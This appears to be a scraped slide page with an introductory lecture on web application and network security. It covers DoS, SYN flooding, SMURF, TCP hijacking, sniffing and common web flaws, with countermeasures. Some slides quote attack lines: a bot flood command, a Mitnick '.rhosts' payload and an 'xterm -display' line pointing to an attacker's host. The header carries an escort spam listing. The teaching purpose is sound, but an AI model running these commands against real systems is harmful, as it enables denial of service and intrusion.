WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 

Web App and Network Security Essentials

  • 1. Web Application and network security Rishabh Mehan
  • 2. Saying Hello !!  To start off with the introduction lets go through few basics  What is a Web Application ?  Where is it Deployed ?  How can it be reached ?
  • 4. Protocols  HTTP – HTTPS  FTP – SFTP  TCP  SSH
  • 5. Request Methods GET POST Form data encoded in the URL Data is included in the body of the request GET http://www.mysite.com/kgsearch/search.php?catid=1 HTTP/1.1 POST http://www.mysite.com/kgsearch/search.php HTTP/1.1 Host: www.mysite.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.mysite.com/ Host: www.mysite.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q= 0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://www.mysite.com/ catid=1
  • 6. How Request flows Server www.mybank.com (64.58.76.230) Port: 80 Client PC (10.1.0.123) Request Response
  • 7. Words of Wisdom “Every program has at least two purposes: the one for which it was written, and another for which it wasn't.” -Alan J. Perlis
  • 8.
  • 9. infrastructure Very complex architectures, multiple platforms, multiple protocols Web Application HTTP Network Business Logic Customer Identification Media Store Browser Web Servers Database Server Presentation Layer Wireless Application Server Content Services Access Controls Transaction Information Core Business Data
  • 10. Why vulnerabilities Security Professionals Don‟t Know The Applications “As a Network Security Professional, I don‟t know how my companies web applications are supposed to work so I deploy a protective solution…but don‟t know if it‟s protecting what it‟s supposed to.” The Web Application Security Gap Application Developers and QA Professionals Don‟t Know Security “As an Application Developer, I can build great features and functions while meeting deadlines, but I don‟t know how to develop my web application with security as a feature.”
  • 11. Common security attacks and their countermeasures  Finding a way into the network  Firewalls  Exploiting software bugs, buffer overflows  Intrusion Detection Systems  Denial of Service  Ingress filtering, IDS  TCP hijacking  IPSec  Packet sniffing  Encryption (SSH, SSL, HTTPS)  Social problems  Education
  • 12. Firewalls  Basic problem – many network applications and protocols have security problems that are fixed over time  Difficult for users to keep up with changes and keep host secure  Solution  Administrators limit access to end hosts by using a firewall  Firewall is kept up-to-date by administrators
  • 14. Firewalls  What does a firewall rule look like?  Depends on the firewall used  Example: ipfw  /sbin/ipfw add deny tcp from cracker.evil.org to wolf.tambov.su telnet  Other examples: WinXP & Mac OS X have built in and third party firewalls  Different graphical user interfaces  Varying amounts of complexity and power
  • 15. Denial of Service  Purpose: Make a network service unusable, usually by overloading the server or network  Many different kinds of DoS attacks  SYN flooding  SMURF  Distributed attacks
  • 16. Denial of Service  SYN flooding attack  Send SYN packets with bogus source address  Why?  Server responds with SYN ACK and keeps state about TCP half-open connection  Eventually, server memory is exhausted with this state  Solution: use “SYN cookies”  In response to a SYN, create a special “cookie” for the connection, and forget everything else  Then, can recreate the forgotten information when the ACK comes in from a legitimate connection
  • 18. Denial of Service  SMURF  Source IP address of a broadcast ping is forged  Large number of machines respond back to victim, overloading it
  • 19. Denial of Service ICMP echo (spoofed source address of victim) Sent to IP broadcast address ICMP echo reply Internet Perpetrator Victim
  • 20. Denial of Service  Distributed Denial of Service  Same techniques as regular DoS, but on a much larger scale  Example: Sub7Server Trojan and IRC bots  Infect a large number of machines with a “zombie” program  Zombie program logs into an IRC channel and awaits commands  Example:  Bot command: !p4 207.71.92.193  Result: runs ping.exe 207.71.92.193 -l 65500 -n 10000  Sends 10,000 64k packets to the host (655MB!)  Read more at: http://grc.com/dos/grcdos.htm
  • 21. TCP Attacks  Recall how IP works…  End hosts create IP packets and routers process them purely based on destination address alone  Problem: End hosts may lie about other fields which do not affect delivery  Source address – host may trick destination into believing that the packet is from a trusted source  Especially applications which use IP addresses as a simple authentication method  Solution – use better authentication methods
  • 22. TCP Attacks  TCP connections have associated state  Starting sequence numbers, port numbers  Problem – what if an attacker learns these values?  Port numbers are sometimes well known to begin with (ex. HTTP uses port 80)  Sequence numbers are sometimes chosen in very predictable ways
  • 23. TCP Attacks  If an attacker learns the associated TCP state for the connection, then the connection can be hijacked!  Attacker can insert malicious data into the TCP stream, and the recipient will believe it came from the original source  Ex. Instead of downloading and running new program, you download a virus and execute it
  • 24. TCP Attacks  Say hello to Alice, Bob and Mr. Big Ears
  • 25. TCP Attacks  Alice and Bob have an established TCP connection
  • 26. TCP Attacks  Mr. Big Ears lies on the path between Alice and Bob on the network  He can intercept all of their packets
  • 27. TCP Attacks  First, Mr. Big Ears must drop all of Alice‟s packets since they must not be delivered to Bob (why?) Packets The Void
  • 28. TCP Attacks  Then, Mr. Big Ears sends his malicious packet with the next ISN (sniffed from the network) ISN, SRC=Alice
  • 29. TCP Attacks  What if Mr. Big Ears is unable to sniff the packets between Alice and Bob?  Can just DoS Alice instead of dropping her packets  Can just send guesses of what the ISN is until it is accepted  How do you know when the ISN is accepted?  Mitnick: payload is “add self to .rhosts”  Or, “xterm -display MrBigEars:0”
  • 30. TCP Attacks  Why are these types of TCP attacks so dangerous? Web server Trusting web client Malicious user
  • 31. TCP Attacks  How do we prevent this?  IPSec  Provides source authentication, so Mr. Big Ears cannot pretend to be Alice  Encrypts data before transport, so Mr. Big Ears cannot talk to Bob without knowing what the session key is
  • 32. Packet Sniffing  Recall how Ethernet works …  When someone wants to send a packet to some else …  They put the bits on the wire with the destination MAC address …  And remember that other hosts are listening on the wire to detect for collisions …  It couldn‟t get any easier to figure out what data is being transmitted over the network!
  • 33. Packet Sniffing  How can we protect ourselves?  SSH, not Telnet  Many people at CMU still use Telnet and send their password in the clear (use PuTTY instead!)  Now that I have told you this, please do not exploit this information  Packet sniffing is, by the way, prohibited by Computing Services  HTTP over SSL  Especially when making purchases with credit cards!  SFTP, not FTP  Unless you really don‟t care about the password or data  Can also use KerbFTP (download from MyAndrew)  IPSec  Provides network-layer confidentiality
  • 34. Web Application Vulnerabilities Web application vulnerabilities occur in multiple areas. Application Administration Extension Checking Common File Checks Platform Known Vulnerabilities Application Mapping Custom Application Scripting Data Extension Checking Parameter Manipulation Backup Checking Reverse Directory Transversal Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsing Cookie Manipulation Brute Force Application Mapping Cookie Poisoning/Theft Buffer Overflow SQL Injection Cross-site scripting
  • 35. What the #@$& is happening ??? % Info Disclosure, 3 Info Disclosure Axis Title File Include File Include Input Valdation Input Valdation Auth Auth % SQL Injection SQL Injection XSS XSS 0 10 20 30 Axis Title 40 50
  • 36. Web Application Vulnerabilities Platform:  Known vulnerabilities can be Platform Known Vulnerabilities exploited immediately with a minimum amount of skill or experience – “script kiddies”  Most easily defendable of all web vulnerabilities  MUST have streamlined patching procedures
  • 37. Web Application Vulnerabilities Administration: Administration Extension Checking Common File Checks Data Extension Checking • • • Backup Checking Directory Enumeration Path Truncation Hidden Web Paths Forceful Browsing • • Less easily corrected than known issues Require increased awareness More than just configuration, must be aware of security flaws in actual content Remnant files can reveal applications and versions in use Backup files can reveal source code and database connection strings
  • 38. Web Application Vulnerabilities Application Programming: • Application Application Mapping Cookie Manipulation Custom Application Scripting Parameter Manipulation Reverse Directory Transversal Brute Force Application Mapping Cookie Poisoning/Theft Buffer Overflow SQL Injection Cross-site scripting Common coding techniques do not necessarily include security • Input is Administration assumed to be valid, but not tested • Unexamined input from a browser can inject scripts into page for replay against later visitors • Unhandled error messages reveal application and database structures • Unchecked database calls can be „piggybacked‟ with a hacker‟s own database call, giving direct access to business data through a web browser
  • 40. How to Secure Web Applications  Incorporate security into the lifecycle  Apply information security principles to all software development efforts  Educate  Issue awareness, Training, etc…
  • 41. Are We still Secure ? LOL NO